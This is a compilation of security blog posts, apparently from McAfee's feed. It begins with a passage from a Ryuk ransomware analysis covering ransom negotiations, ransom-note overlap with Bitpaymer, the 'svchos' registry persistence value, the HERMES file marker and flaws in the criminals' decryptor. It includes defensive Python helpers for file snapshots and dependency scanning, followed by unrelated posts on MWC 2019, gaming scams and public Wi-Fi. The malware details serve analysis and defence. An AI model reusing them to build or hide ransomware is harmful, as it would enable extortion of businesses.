The bar-belled negotiation outcomes meant that some victims were stonewalled. These victims either lost their data or took on staggering financial risk to pay the ransom. The outcomes also imply that in certain cases the adversary would rather receive infrequent large windfalls (often in excess of 100BTC), while in other cases the adversary was keen to monetize every attack and accept lower amounts to ensure payment. This difference in modus operandi suggests that more than one cyber-criminal group is operating Ryuk ransomware.

Ransom Note and Negotiation Similarities and Differences

Similarities between Bitpaymer and Ryuk ransom notes have been observed before. While it is not uncommon for ransom notes to share similar language, sequences of phrases tend to remain within the same ransomware family. Slight copy+paste modifications are made to the ransom text as a variant is passed along to different groups, but large alterations are rarely made. Below is a comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right).

A comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right)

The shared language implies that text once unique to a Bitpaymer campaign was borrowed for a Ryuk campaign, possibly by an operator running simultaneous Bitpaymer and Ryuk campaigns; alternatively, the imitation can simply be considered the sincerest form of flattery.

Different Initial Email Response May Be Different Adversaries?

A more dramatic scripted communication difference has been observed in the initial email response from Ryuk adversaries. The initial email response is typically identical within ransomware families belonging to the same campaign. When significant differences in length, language, and initial ransom amount appear in the initial email response, we are comfortable assuming they belong to distinct groups with distinct modus operandi. This would mean that Ryuk is being spread by more than one actor group.

Below are two such Ryuk examples:

 

Post Payment Bitcoin Activity

A final place to look for evidence that multiple groups run simultaneous Ryuk campaigns is what happens to the bitcoin after it reaches a ransom address. Surprisingly, despite the differences in negotiation outcomes and initial communications, Coveware observed little difference between the BTC wallets (blacked out to protect victims) associated with the above cases. An initial comparison showed no meaningful difference in the interval between a ransom payment and the corresponding withdrawal. Additionally, the withdrawn funds were consistently split between two addresses. Coveware will continue to monitor the funds associated with campaigns for meaningful indicators.

Ryuk Negotiating Profiles

With few exceptions, the rest of the email replies during a Ryuk extortion negotiation are extremely short and blunt. Typical replies and retorts are generally less than 10 written words and often just a single number if the ransom amount is the point of discussion. This correspondence is unique to Ryuk.

One reply did contain quite a remarkable expression, “à la guerre comme à la guerre,” used to contextualize the methods and reasons for the cyber criminals’ attacks on western companies. The French expression originates from the seventeenth century and literally translates to “in war as in war”; loosely, it means “in harsh times one has to make do with what’s available.” The striking thing about this expression is that it is prominently featured in volume 30 of the collected works of the Soviet revolutionary leader Vladimir Lenin. Lenin uses the expression to describe the struggle of his people during the war against western capitalism.

This concept of “the capitalist West versus the poor East” is something McAfee ATR quite often sees expressed by cyber criminals from some of the post-Soviet republics. The expression may therefore be an indicator of the origin and cultural outlook of the criminals behind Ryuk.

Ryuk poses existential risk to certain industries

Even though the average ransom discounts for Ryuk are large (~60%), the absolute level of the ransom is extreme. We have seen evidence that links ransom demands to the size of the victim company’s network footprint. However, this doesn’t mean that the ransom demand correlates with the victim’s actual operational and financial size.

Companies in the IT hosting and the freight and logistics industries have been particularly susceptible to this discrepancy. Coveware has assisted at least 3 companies that have had to unwind their business when an affordable ransom amount could not be reached. Typically, downtime costs are 10x the ransom amount, but in these industries downtime costs can be particularly extreme.

IT Hosting companies are of note as the size and number of their servers can make them appear like a large organization. Unfortunately, the business of hosting involves high fixed costs, low operating margins, and zero tolerance of downtime by end clients.  Hosting companies that get attacked typically have a few hours to restore service before their clients drop them for alternatives. Moreover, these companies suffer irreparable harm to their reputations, and may trigger SLA breaches that leave them exposed to liability.  The inability to pay a six-figure ransom has caused multiple hosting companies to shut down.

Freight and Logistics firms are also acutely exposed. These firms also present like larger firms given the volume of data they move and their network footprint. Additionally, attacks against Freight and Logistics firms can cause immediate supply chain issues for the victims’ end clients, who are subsequently forced to route through other service providers. Similar to IT Hosting, Freight and Logistics firms have low operating margins and end clients with little tolerance for service interruptions. The inability to pay or negotiate a large ransom has materially impacted several firms in this industry.

Ryuk Decryptor findings and issues

When victims do pay the exorbitant ransom amount, the criminals provide a decryptor to unlock their files. This decryptor is actually a framework that has to be loaded with the victim’s private RSA key, provided by the criminals, in order to decrypt, ensuring that the provided decryptor will only work for that specific victim. This setup allows the criminals to quickly load a victim’s key into the framework and offer a custom decryptor with minimal code change while the underlying framework remains the same.

From Coveware’s experience we have learned that the decryption process is quite cumbersome and full of possible fatal errors. Luckily Coveware was able to share the Ryuk decryptor with McAfee ATR in order to take a closer look at the issues and level of sophistication of the decryptor.

Once launched, the first thing the decryptor does is search the HKEY_CURRENT_USER hive for a value named “svchos” under the path “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” and delete that entry. This removes the malware’s persistence. Afterwards it reboots the system and removes any Ryuk malware still residing on the system.

Deleting the “svchos” value from the registry.

Once rebooted the user needs to run the tool again and the decryptor will provide two options to decrypt.

  • Decryption per file
  • Automatic decryption

The main interface of the Ryuk decryptor with the different menu options.

HERMES File Marker

During the decryption process we have found that the decryptor searches for the known file marker string HERMES which is located in the encrypted file.

The HERMES marker clearly visible within the file

The fact that Ryuk ransomware adds the HERMES file marker string was already known, but discovering this specific check routine in the decryptor further strengthens the hypothesis that Ryuk is a slightly modified version of the Hermes2.1 ransomware kit that is sold online.

Decryptor Issues

While examining the decryptor we were astonished by the lack of sophistication and the number of errors in the code. Some of the most prominent issues were:

  • If there is a space in the Windows file path, the decryptor fails the decryption process.
  • If there is a quotation mark (“) in the file path, the decryptor reports an error that it cannot find the specific file.
  • The decryptor uses the “GetVersionExW” function to determine the Windows version. Beginning with Windows 8.1 this API reports the Windows 8 version (6.2) to any application that does not declare support for newer releases in its manifest, and the decryptor isn’t designed to handle that value.
  • The decryptor doesn’t remove the .RYUK extension and replace it with the original extension, so the file name gives no indication of the file type. Working out the type of every file afterwards can be extremely labor intensive for enterprise victims.
  • When choosing the manual option in the decryptor, the user has to supply the path of a specific file or choose “0” to finish. However, choosing “0” puts the decryptor into an infinite loop.

Looking at the decryptor, it is very worrisome to see that the criminals behind Ryuk can get away with such bad programming. It shows a clear lack of empathy towards their victims and the absence of solid coding skills. Victims who do pay the exorbitant ransom demand are far from in the clear. The decryptor offered by the criminals has a very high risk of malfunctioning, resulting in permanent damage to their precious files. Victims should always make an exact copy of the encrypted hard disk before trying to use the decryptor.
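Two of the practical consequences above, copy the encrypted data before running the decryptor and expect to restore file extensions yourself, are shown in the following added example. It is not McAfee’s, Coveware’s or the criminals’ code. The “encrypted” bytes are constructed; the HERMES marker is searched for anywhere in the file because the text above states no offset; and the extension guesser relies on well-known file signatures (PDF, ZIP/OOXML, OLE2, PNG, JPEG). The snapshot step records a SHA-256 per copy so that a decryptor failure on the working copy can be detected and never touches the original.

```python
"""Pre- and post-decryption helpers for a Ryuk incident (added example; not
McAfee's, Coveware's or the criminals' decryptor code).

Before anything is handed to the vendor's decryptor, every marked .RYUK file
is copied to a working directory and its SHA-256 recorded. Afterwards, because
the decryptor leaves the .RYUK suffix in place, the original type is recovered
from the decrypted content's leading bytes.
"""
import hashlib
import os
import shutil
import tempfile

HERMES_MARKER = b"HERMES"

# Leading bytes of common document and image formats (standard signatures).
MAGIC = [
    (b"%PDF-", ".pdf"),
    (b"PK\x03\x04", ".zip"),        # also .docx/.xlsx/.pptx, which are ZIP containers
    (b"\xd0\xcf\x11\xe0", ".doc"),  # legacy OLE2 compound file (.doc/.xls)
    (b"\x89PNG", ".png"),
    (b"\xff\xd8\xff", ".jpg"),
]

def has_hermes_marker(data):
    """True if the Hermes/Ryuk marker appears anywhere in the blob (offset assumed unknown)."""
    return HERMES_MARKER in data

def guess_extension(data, default=".bin"):
    """Choose an extension from the decrypted content's leading bytes."""
    for magic, ext in MAGIC:
        if data.startswith(magic):
            return ext
    return default

def restored_name(encrypted_name, decrypted_data):
    """'report.RYUK' plus decrypted PDF bytes -> 'report.pdf'."""
    stem = encrypted_name[:-len(".RYUK")] if encrypted_name.endswith(".RYUK") else encrypted_name
    ext = guess_extension(decrypted_data)
    return stem if stem.lower().endswith(ext) else stem + ext

def sha256_of(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()

def snapshot_encrypted(src_dir, work_dir):
    """Copy each marked .RYUK file into work_dir; return {name: sha256} for later verification."""
    manifest = {}
    for root, _, names in os.walk(src_dir):
        for name in names:
            path = os.path.join(root, name)
            with open(path, "rb") as fh:
                data = fh.read()
            if name.endswith(".RYUK") and has_hermes_marker(data):
                dest = os.path.join(work_dir, name)
                shutil.copy2(path, dest)          # preserves timestamps for the timeline
                manifest[name] = sha256_of(dest)
    return manifest

def demo():
    """Build a constructed victim directory, snapshot it, then name a decrypted file."""
    src = tempfile.mkdtemp(prefix="victim_")
    work = tempfile.mkdtemp(prefix="work_")
    try:
        # Constructed 'ciphertext': filler bytes with the marker embedded.
        with open(os.path.join(src, "report.RYUK"), "wb") as fh:
            fh.write(bytes(range(64)) + HERMES_MARKER + bytes(range(32)))
        with open(os.path.join(src, "notes.txt"), "wb") as fh:
            fh.write(b"untouched file without the marker")
        manifest = snapshot_encrypted(src, work)
        # Stand-in for the decryptor's output, whose name would still end in .RYUK.
        decrypted = b"%PDF-1.4\n%constructed sample\n"
        return sorted(manifest), restored_name("report.RYUK", decrypted)
    finally:
        shutil.rmtree(src)
        shutil.rmtree(work)

if __name__ == "__main__":
    print(demo())
```

Run the decryptor only against the working directory; if a file comes back unchanged or truncated, the recorded hash shows whether the input copy was intact, and the original is still available for a second attempt.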

Call to action in piecing the different parts together

By combining all the fresh insights with the information that was already discovered by ourselves and industry peers we can start defining our leading hypotheses around Ryuk. Based on this hypothesis, we will actively look for falsifying evidence. We encourage the security community to participate in this process. We realize that only by collaboration can we piece the different parts of the Ryuk puzzle together.

By now it should be beyond question that involvement of the DPRK is the least likely hypothesis. Our leading hypothesis on Ryuk, until proven otherwise, is:

Ryuk is a direct descendant of Hermes2.1 with slight modifications, based on the code overlap in the ransomware as well as the decryptor. Ryuk is not designed to be used in a large-scale corporate environment, based on all the scalability issues in the decryptor. At this moment there are several actors or actor groups spreading Ryuk, based on the extortion modus operandi and the differing communications with victims. The actors or actor groups behind Ryuk have a relationship with one of the post-Soviet republics, based on the Russian-language text found in one of the encrypted files and the cultural references observed in the negotiations. The actors behind Ryuk most likely have an affiliation or relationship with the actors behind Trickbot and, based on their TTPs, are better skilled at exploitation and lateral movement than at ransomware development.

Conclusion

In the last seven months Ryuk has proven to be a highly profitable form of ransomware, despite the poor programming behind it and its decryptor. The criminals have proven to be ruthless and several of their victims were forced to wind down their businesses after they were unable to afford the exorbitant ransom.

When a company does give in to the high demands it is extra painful to see a situation occur where they are permanently unable to recover their files due to the faulty decryptor.

A solid strategy for preventing data loss, above all tested backups kept offline, remains the best defence against all forms of ransomware; for general prevention advice please visit NoMoreRansom. Always seek professional assistance when you are faced with a targeted ransomware attack such as Ryuk.

The post Ryuk, Exploring the Human Connection appeared first on McAfee Blogs.

MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity

These days, it’s rare to walk into a home that doesn’t have a smart device in use. From voice assistants, smart TVs, tablets, and more, these devices have greatly enhanced our way of life through intelligent connectivity. Intelligent connectivity is defined by the highly contextualized and personal experiences offered by the smart devices we utilize on a daily basis. However, as manufacturers continue to push out the latest technology to stay ahead of their competitors, device security isn’t always top-of-mind. As a result, the level of confidence consumers have in their devices is reduced. At McAfee, we understand that the notion of digital trust is imperative to the future of security as we adopt technologies shaped by the likes of 5G networks, the Internet of Things (IoT), artificial intelligence (AI), and big data. And as we head into Mobile World Congress 2019 (MWC), one can’t help but wonder, how will these advancements shape the future of mobile connectivity?

Almost every new device is built to connect, and as our 2019 Threats Predictions Report showed us, our dependence on technology is ubiquitous. Take your smartphone, for example. Everywhere you go, this minicomputer allows you to chat with your friends online, send emails, and look up new information with just the press of a button. Only upping the ante, 5G is set to roll out across the nation, bringing greater speed to handheld devices with more data and lower latency. These benefits will set the stage for more IoT devices, such as your smart refrigerator or smart plug, to connect to the network as well. The ability to control the temperature of your refrigerator from your smartphone is a pretty cool capability. But what happens if your smartphone gets hacked and a cybercriminal remotely disables your refrigerator? You may be left with a bigger problem than some spoiled food.

With all of your smart devices on the same 5G network, a malicious actor who compromises just your mobile phone could gain access to the data that lives in your smart home technology. The increase in devices on the 5G network also increases the risk of distributed denial-of-service, or DDoS, attacks, in which cybercriminals flood a network with so much traffic that it can’t operate or communicate as it normally would. And with more IoT devices operating on the 5G network, the consequences of such an attack could be truly crippling. So, how can we continue to trust the devices we use on a daily basis despite the cybersecurity risks that come with greater connectivity?

Digital trust, or the level of confidence consumers have in their technology and mobile devices, is extremely delicate. And as our experiences with our devices become more and more personalized thanks to intelligent connectivity, it’s important to realize that it can’t be intelligent if there is no trust. That’s why consumers should embrace advancements in mobile technology but remember to keep cybersecurity practices at the forefront.

Whether you’re headed out to Barcelona for MWC 2019 or watching from afar, we here at McAfee are committed to helping you take the necessary precautions required in order to connect with confidence in a world where everything is built to connect.

Stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post MWC 2019: The Key to Establishing Digital Trust with Intelligent Connectivity appeared first on McAfee Blogs.

Veracode included in new Forrester Now Tech: Software Composition Analysis, Q1 2019


Vulnerable components in software lurk everywhere. At the same time, business competitiveness hinges on the speed and quality of software delivery. So, how does an enterprise not only keep up with application security, but also thrive despite the threats posed by risks in their software?

A software composition analysis (SCA) solution can help organizations identify known vulnerabilities from open source components used by their applications, and alert businesses when new vulnerabilities are discovered after an application has been scanned or when existing known vulnerabilities have had their severity level upgraded.
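As an added illustration (not Veracode’s product code), the two behaviours described above, matching packaged components against known vulnerabilities and re-alerting when an advisory is new or has been re-rated since the last scan, look like this in a few dozen lines of Python. The manifest, package names, version ranges and advisory IDs are all constructed for the example.

```python
"""Minimal software composition analysis pass (added example, not Veracode's code).

Matches the components in a dependency manifest against a constructed
advisory feed, then diffs two scans so that a newly published advisory or an
upgraded severity raises an alert for an application scanned earlier.
"""

SEVERITY_RANK = {"low": 1, "medium": 2, "high": 3, "very high": 4}

# Constructed manifest in requirements.txt style (pinned versions, invented packages).
MANIFEST = """
# web tier
flasky==1.0.2
fastxml==2.9.0
imgkit==0.4.1
"""

# Constructed advisory feed: affected range is [introduced, fixed).
ADVISORIES_DAY1 = [
    {"id": "ADV-0001", "package": "fastxml", "introduced": "2.0.0",
     "fixed": "2.9.3", "severity": "medium"},
    {"id": "ADV-0002", "package": "imgkit", "introduced": "0.0.0",
     "fixed": "0.4.0", "severity": "high"},
]

# The next day ADV-0001 is re-rated and a new advisory lands for flasky.
ADVISORIES_DAY2 = [
    {"id": "ADV-0001", "package": "fastxml", "introduced": "2.0.0",
     "fixed": "2.9.3", "severity": "very high"},
    {"id": "ADV-0002", "package": "imgkit", "introduced": "0.0.0",
     "fixed": "0.4.0", "severity": "high"},
    {"id": "ADV-0003", "package": "flasky", "introduced": "1.0.0",
     "fixed": "1.0.3", "severity": "high"},
]

def parse_version(text):
    """'2.9.0' -> (2, 9, 0): numeric tuples compare correctly ('2.10.0' > '2.9.0'), strings do not."""
    return tuple(int(part) for part in text.strip().split("."))

def parse_manifest(text):
    """Return {package: version_tuple} from 'name==version' lines, ignoring comments."""
    deps = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, _, version = line.partition("==")
        deps[name.strip().lower()] = parse_version(version)
    return deps

def affected(version, advisory):
    """True if version falls inside the advisory's half-open affected range."""
    return parse_version(advisory["introduced"]) <= version < parse_version(advisory["fixed"])

def scan(manifest_text, advisories):
    """Return {advisory_id: (package, severity)} for every matching component."""
    deps = parse_manifest(manifest_text)
    findings = {}
    for adv in advisories:
        version = deps.get(adv["package"])
        if version is not None and affected(version, adv):
            findings[adv["id"]] = (adv["package"], adv["severity"])
    return findings

def diff_scans(previous, current):
    """Alerts for advisories that are new, or whose severity rose, since the previous scan."""
    alerts = []
    for adv_id, (package, severity) in current.items():
        if adv_id not in previous:
            alerts.append(("new", adv_id, package, severity))
        elif SEVERITY_RANK[severity] > SEVERITY_RANK[previous[adv_id][1]]:
            alerts.append(("upgraded", adv_id, package, severity))
    return alerts

if __name__ == "__main__":
    day1 = scan(MANIFEST, ADVISORIES_DAY1)
    day2 = scan(MANIFEST, ADVISORIES_DAY2)
    for alert in diff_scans(day1, day2):
        print(alert)
```

Note that imgkit 0.4.1 is never reported because the advisory’s fixed version is 0.4.0: the half-open range check is what keeps a patched component from raising a false alert.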

Companies using SCA gain benefits beyond more secure code as well – they can reduce unplanned work, lower risk exposure across the business, and achieve regulatory compliance.

A new report from Forrester Research, Now Tech: Software Composition Analysis, Q1 2019, details the importance of improving open source security with SCA and guides security professionals with descriptions and key takeaways about what to expect from an SCA vendor to provide the best value to their organizations.

It lists Veracode among the largest providers based on annual revenue.

The Now Tech: Software Composition Analysis, Q1 2019 report states:

According to global security decision makers, the top two business priorities for their firms are to grow revenue and improve the experience of customers (41% and 38% of respondents, respectively, said this is a high or critical priority). Accelerating the use of open source components can help achieve both priorities by letting developers focus on creating new and unique features rather than recreating basic functionality. It’s long past time for security pros to realize the benefits of open source components and embrace its use in development.

Every business needs to understand the pervasive nature of vulnerabilities in the software that is powering advancements in every industry. Veracode’s State of Software Security Report Vol. 9 found that more than 85 percent of all applications have at least one vulnerability in them. The report, based on 700,000 scans performed over 12 months, also found 87.5 percent of Java apps contain at least one vulnerable component, and the pass rate for the OWASP Top 10 most critical web application security risks on initial scan declined for the third year in a row.

Click here to read the full Forrester Now Tech: Software Composition Analysis, Q1 2019 report, and find out more about Veracode’s SCA capabilities.

Mobile World Congress 2019: Q&A with McAfee Leadership

Next week, Mobile World Congress (MWC) will kick off in Barcelona. This year’s event will have an estimated 107,000 attendees, along with 2,400 exhibitors, all representing about 205 countries. While the focus of the event is mobility, we can expect the industry to continue to drive conversations around IoT, artificial intelligence, 5G, connectivity, and more.

As Europe’s biggest gathering in the IT sector nears, we spoke with McAfee leadership about the major themes we should expect to see at MWC this year and what it means for McAfee.

Q: Artificial intelligence and the new 5G standard have been the hot topics of mobility. Do you think these two topics will play an important role at this year’s Mobile World Congress?

Gary Davis, Chief Consumer Security Evangelist: Absolutely. With 5G starting to be rolled out, everyone is waiting with bated breath to see how that affects society and our ecosystems in general. With technologies like 5G enabling almost zero latency, more data will be collected and aggregated. Insights from that mass of data can only be gleaned by using AI-based solutions.

Radhika Sarang, Director of Global Consumer Product Marketing: 5G and AI should be hot topics of discussion at MWC 2019. I fully expect several products and services displaying both technologies on the show floor. 5G will be transformative in how we consume content, adopt new technologies, and connect with one another. However, this phenomenon will increase the need for redefining the concept of digital trust. Narrow or weak AI has grown leaps and bounds recently in areas of natural language processing, machine learning, and advanced analytics. These technologies are also enabling cybersecurity teams to foresee cyberattacks and create proactive solutions.

Q: This year’s theme for Mobile World Congress is Intelligent Connectivity. What does this term mean to McAfee? What does it mean for enterprise businesses?

Davis: For McAfee, we would interpret that to mean that for something to be intelligent, trust must be established. Without trust, intelligent connectivity fails to exist.

Nathan Jenniges, Senior Director of the Device Security Business: It means having access to information when and how you need it. Increasingly the “how” is through mobile devices. The “when” is not defined by traditional business hours, as people engage at all times of the day. They also use the same device for enterprise business as they do for personal business, which increases the level of risk to an organization. Inherent in intelligent connectivity is security. You can connect at any time. But to connect intelligently, you need to be confident the connection is secure and not increasing your risk. As an example, you could connect your mission critical equipment to any electrical outlet. But if you connected intelligently, you’d have some sort of surge protector, so you don’t destroy your mission critical equipment. The surge protector is equivalent to protecting mobile devices from attack when they are connected to organizational resources.

Q: At any industry event, we can expect to see announcements for new technologies and IoT devices. What can you tell us about new security challenges that may arise this year and beyond?

Davis: Most everything being built today is engineered to be connected. However, most manufacturers are solving for time to market and convenience, thus forgoing any meaningful security controls. This results in the rapid expansion of the attack surface, which bad actors will most definitely target.

Sarang: Security threat vectors are shifting and evolving alongside the growth of IoT among consumers, enterprises, and network providers. Hackers are always looking to find creative ways to monetize in this increasingly connected world. With predictions of over 50 devices in each household by 2020, we fully expect to see more DDoS attacks and IoT-based ransomware. And with the advent of 5G that promises to transform our digital lives, it’s imperative that security is addressed as a top priority by service providers to create consumer digital trust in an even more connected world.

Q: How will mobile impact the enterprise in 2019?

Jenniges: Mobile threats continue to increase at record-breaking levels with more and more vulnerabilities discovered every month. In alignment with the threat, more business work is being done on mobile than ever before as mobile devices quickly become the dominant endpoint device. These devices access the same information and contain the same information that a traditional endpoint does with zero protection. As an attacker, you will look for the most efficient attack path and mobile is clearly the new favorite path.

 

We’ll be making a splash at this year’s conference, so be sure to stop by booth #5A21 in Expo Hall 5, where we will host demos, giveaways, and more. Also, be sure to follow @McAfee and @McAfee_Home for real-time updates from the show and opportunities to win giveaways throughout the week.

The post Mobile World Congress 2019: Q&A with McAfee Leadership appeared first on McAfee Blogs.

When snazzy apps fail at providing real-time information; gate agents (actual humans!) prevail

I was recently traveling, and I downloaded the airlines’ app to use on the road.  It did prove to be initially beneficial when checking in and selecting my seat.  However, I’d like to suggest that the app prompts to opt-in to push notifications, instead of leaving it as a toggle within the app.  When navigating […]

The post When snazzy apps fail at providing real-time information; gate agents (actual humans!) prevail appeared first on Privacy Ref Blog.

MWC 2019: Why 5G + Fortnite = a win-win for criminals

So apparently, the company behind Fortnite has so much cash that it’s forming a $100 million prize fund for upcoming competitions. It’s hardly surprising since its creators, Epic Games, confirmed that by the end of November 2018, 200 million players had registered accounts across PCs, gaming consoles and on mobile. The Android app alone was downloaded 15 million times within the first three weeks of its release.

Staggeringly though, this remains a ‘free’ game and while the freemium model is hardly new in the world of mobile apps – just consider the returns Supercell got with Clash of Clans – it does provide an opportunity for criminals to also get their share. Unsurprisingly the promise of achieving an advantage is particularly attractive since top gamers can earn hundreds of thousands of dollars.

Combined with alternative delivery methods such as the use of an invitation-only beta version of Fortnite distributed in August 2018, we saw the growth in promises of invitations, and over-eager YouTubers with links to apps that were not what they appeared. From an InfoSec perspective this is hardly surprising, but the reality is that we are dealing with an audience demonstrating no due diligence in their pursuit of access to the latest games.

While Fortnite is undoubtedly a phenomenon, it’s just the tip of the iceberg. There are already challengers nipping at its heels. PUBG Mobile, for example, is played by 30 million people daily, while there are plans for EA’s Apex Legends to move over to mobile, having acquired 10 million online players in its first 72 hours.

The growing appetite for mobile gaming will only increase further this year with the arrival of 5G networks and their promise of super-fast speeds and ultra-low latency. And of course, as the number of mobile gamers continues to grow, so too will the opportunity for criminals to exploit them.

75 percent of gamers claimed security was the element that most concerned them about the future of gaming. Such concerns are hardly surprising since we found almost two thirds of gamers have or know someone who has been directly affected by a cyberattack, with the average gamer experiencing around five attacks. However, the likelihood is that these concerns are put to one side when a link to a third-party app store offers a beta version to the latest gaming phenomenon.

Analysts suggest that 2018 was a tipping point for mobile gaming, when cost, convenience and a social element saw the channel become bigger than console and PC gaming combined. Unfortunately, this means opportunistic criminals now have their eyes on a huge and growing number of potential victims.

Join us at this year’s Mobile World Congress in Barcelona, where we’ll be demoing McAfee Gamer Security, and revealing how criminals are cashing in on Fortnite and its unorthodox distribution method.

The post MWC 2019: Why 5G + Fortnite = a win-win for criminals appeared first on McAfee Blogs.

The Risks of Public Wi-Fi and How to Close the Security Gap

As I write this blog post, I’m digitally exposed, and I know it. For the past week, I’ve had to log on to a hospital’s public Wi-Fi each day to work while a loved one recuperates.

What seems like a routine, casual connection to the hospital’s Wi-Fi isn’t. Using public Wi-Fi is a daily choice loaded with risk. Sure, I’m conducting business and knocking out my to-do list like a rock star but at what cost to my security?

The Risks

By using public Wi-Fi, I’ve opened my online activity and personal data (via my laptop) up to a variety of threats including eavesdropping, malware distribution, and bitcoin mining. There’s even a chance I could have logged on to a malicious hotspot that looked like the hospital network.

Like many public Wi-Fi spots, the hospital’s network could lack encryption, which is a security measure that scrambles the information sent from my computer to the hospital’s router so other people can’t read it. Minus encryption, whatever I send over the hospital’s network could potentially be intercepted and used maliciously by cybercriminals.

Because logging on to public Wi-Fi is often a necessity — like my situation this week — security isn’t always the first thing on our minds. But over the past year, a new normal is emerging. A lot of us are thinking twice. With data breaches, privacy concerns, the increase in the market for stolen credentials, and increasingly sophisticated online scams making the headlines every day, the risks of using public Wi-Fi are front and center.

Rising Star: VPN

The solution to risky public Wi-Fi? A Virtual Private Network (VPN). A VPN allows users to securely access a private network and share data remotely through public networks. Much like a firewall protects the data on your computer, a VPN protects your online activity by encrypting your data when you connect to the internet from a remote or public location. A VPN also conceals your location, IP address, and online activity.

Using a VPN helps protect you from potential hackers using public Wi-Fi, which is one of their favorite easy-to-access security loopholes.

Who Needs a VPN?

If you (or your family members) travel and love to shop online, access your bank account, watch movies, and do everyday business via your phone or laptop, a VPN would allow you to connect safely and encrypt your data no matter where you are.

A VPN can mask, or scramble, your physical location, banking account credentials, and credit card information.

Also, if you have a family data plan you’ve likely encouraged your kids to save data by connecting to public Wi-Fi whenever possible. Using a VPN, this habit would be secured from criminal sniffers and snoopers.

A VPN allows you to connect to a proxy server that will access online sites on your behalf and enables a secure connection most anywhere you go. A VPN also hides your IP address and allows you to browse anonymously from any location.

How VPNs work

To use a VPN, you subscribe to a VPN service, download the app onto your desktop or phone, set up your account, and then log on to a VPN server to conduct your online activity privately.

If you are still logging on to public Wi-Fi, here are a few tips to keep you safe until VPNs become as popular as Wi-Fi.

Stay Safe on Public Wi-Fi

Verify your connection. Fake networks that mine your data abound. If you are logging on to Wi-Fi in a coffee shop, hotel, airport, or library, verify the exact name of the network with an employee. Also, only use Wi-Fi that requires a password to log on.

Don’t get distracted. For adults, as well as kids, it’s easy to get distracted and absorbed with our screens — this is risky when on public Wi-Fi, according to Diana Graber, author of Raising Humans in a Digital World. “Knowing how to guard their personal information online is one of the most important skills parents need to equip their young kids with today,” says Graber. “Lots of young people visit public spaces, like a local coffee shop or library, and use public Wi-Fi to do homework, for example. It’s not uncommon for them to get distracted by something else online or even tempted to buy something, without realizing their personal information (or yours!) might be at risk.”

Disable auto Wi-Fi connect. If your phone automatically joins surrounding networks, you can disable this function in your settings. Avoid linking to unknown or unrecognized networks.

Turn off Wi-Fi when done. Your computer or phone can still transmit data even when you are not using it. Be sure to disconnect from the network and turn off Wi-Fi when you are finished using it.

Avoid financial transactions. If you must use public Wi-Fi, don’t conduct a sensitive transaction such as banking, shopping, or any kind of activity that requires your social security or credit card numbers or password use. Wait until you get to a secured home network to conduct personal business.

Look for the HTTPS. Fake or unsecured websites will not have the HTTPS in their address. Also, look for the little lock icon in the address bar to confirm a secure connection.

Secure your devices. Use a personal VPN as an extra layer of security against hackers and malware.

The post The Risks of Public Wi-Fi and How to Close the Security Gap appeared first on McAfee Blogs.

Weekly Update 126

Another week, another conference. This time it was Microsoft Ignite in Sydney and as tends to happen at these events, many casual meetups, chats, beers, selfies, delivery of HIBP stickers and an all-round good time, albeit an exhausting one. That's why I'm a day late this week having finally arrived home late last night.

Moving on though, I've got a bunch of other events coming up particularly in conjunction with the folks at NDC. Brisbane in a couple of weeks, Gold Coast in April then Minnesota in May. Oh - plus Oslo in June and stretching out beyond that, Sydney in October. The link in the references below about how conferences can help keep speakers happy (or piss them off, as it may be), explains why I keep doing these events. All that plus more data breach news and my thoughts on the subsequent lists of credential stuffing data.

References

  1. I'm doing a free user group in Brisbane for NDC on Thursday 28 Feb (this will be a really casual presentation, Q&A and fun night out)
  2. Speaking of NDC, the show will be on in my home town of the Gold Coast in late April (that's a dedicated security event which Scott Helme will be down for too)
  3. Speaking of NDC, I'll also be at NDC Minnesota in May (Hack Yourself First workshop and a shiny keynote)
  4. The reason I keep doing NDC events is because they don't do any of these things! (that's the 10 things conferences do to upset their speakers)
  5. A heap of new data was leaked earlier on in the week (EyeEm has since been loaded into HIBP)
  6. And then even more data breaches were announced a couple of days ago (I'll obviously be keeping an eye out for those too)
  7. All these new data breaches are already starting to make the debate around credential stuffing collections a memory (but as I explain in that post, I think we're past hyping every single one of them up)

The 11 biggest issues IT faces today

Each year we talk with tech leaders about the biggest problems they’ll face in the near future, and we’re starting to see some subtle and not-so-subtle shifts from the worries of 2018.

Data overload, a major concern 12 months ago, has evolved as new data-hungry tools and AI help make sense of data and drive business decisions. This year CIOs say they’re more concerned with how to protect that data, as organizations grapple with new privacy regulations.

As the economy continues to improve, CIOs are less hampered in 2019 by tightening budgets. And worries about moving to the cloud are less of an issue, since many companies have already made the jump. Executives put more emphasis now on securing their cloud-based assets across multiple cloud environments.  

PACE – People, Alignment, Culture, and Execution

McAfee was founded in 1987, and at 32 years old, we’re moving faster than ever before with more precision, agility, and innovation. With McAfee’s expected growth in 2019 as the device-to-cloud cybersecurity company, we recognize the need to ensure that the Americas Channel Team is sharply focused. As I’ve met with members of my team, both individually and in planning sessions, we are already hitting the ground running. This year, the stage is set for our PACE—our pace within the company, and our People, Alignment, Culture, and Execution.

The first focus area, Our People, not only encompasses our team, but also our partners and customers. I truly believe if you take care of the people, the people will take care of you. As a Channel Organization, we ensure that both our partners’ and customers’ needs are met. Through tightly aligned cross-functional organizations internally, we are creating powerful unity as we serve customers together.

Our Alignment concentrates on making sure we’re moving in the same direction at the same time.

Within Our Culture, we have a primary and secondary culture. Our primary culture is centered around our pledge that each McAfee employee signs, declaring dedication to keeping the world safe from cyberthreats. However, the Channel Organization has also cultivated a secondary culture, which is supported by our corporate value surrounding candor and transparency. We aim for both cultures to be evident in everything we do.

With Our Execution, we believe that if we commit to something, we must execute it. Accountability is a priority for our team. Our Execution is currently centered around our MVISION portfolio family, which includes MVISION Endpoint, ePO, Cloud, Mobile, and EDR (coming soon). Designed to encompass our overall brand through a simple approach, MVISION is an integrated, open system from device to cloud that offers consolidated visibility, comprehension, and control across a digital landscape. If you’re not up to speed on MVISION, please take some time to research and get familiar. Our mutual customers are going to love it.

This year, we are excited to be working on our PACE. We are committed to maintaining a healthy PACE for the betterment of our customers, partners, and team. We hope the PACE we set this year will serve all who interact with McAfee.

The post PACE – People, Alignment, Culture, and Execution appeared first on McAfee Blogs.

